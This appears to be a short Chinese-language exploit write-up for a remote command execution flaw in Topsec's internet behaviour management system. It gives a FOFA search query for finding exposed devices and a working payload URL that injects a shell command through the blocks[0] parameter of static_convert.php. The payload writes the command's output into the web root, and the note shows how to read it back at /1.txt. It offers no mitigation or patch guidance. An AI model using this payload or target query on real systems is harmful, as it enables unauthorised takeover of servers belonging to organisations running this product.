T3-1天融信-上网行为管理-RCE

漏洞描述：

天融信上网行为管理系统是天融信公司凭借多年来的安全产品研发经验，为满足各行各业进行网络行为管理和内容审计的专业产品。天融信上网行为管理系统存在命令执行漏洞，攻击者可利用该漏洞获取服务器控制权。

网站图片:

网络测绘:

fofa语法：

fofa app=“天融信-上网行为管理系统”

漏洞复现:

通过POC执行命令并将命令执行结果写入1.txt文件中

payload：

http://xx.xx.xx.xx/view/IPV6/naborTable/static_convert.php?blocks[0]=||%20%20ls%20%3E%3E%20/var/www/html/1.txt%0A

效果图:

访问1.txt获取命令执行结果

http://xx.xx.xx.xx/1.txt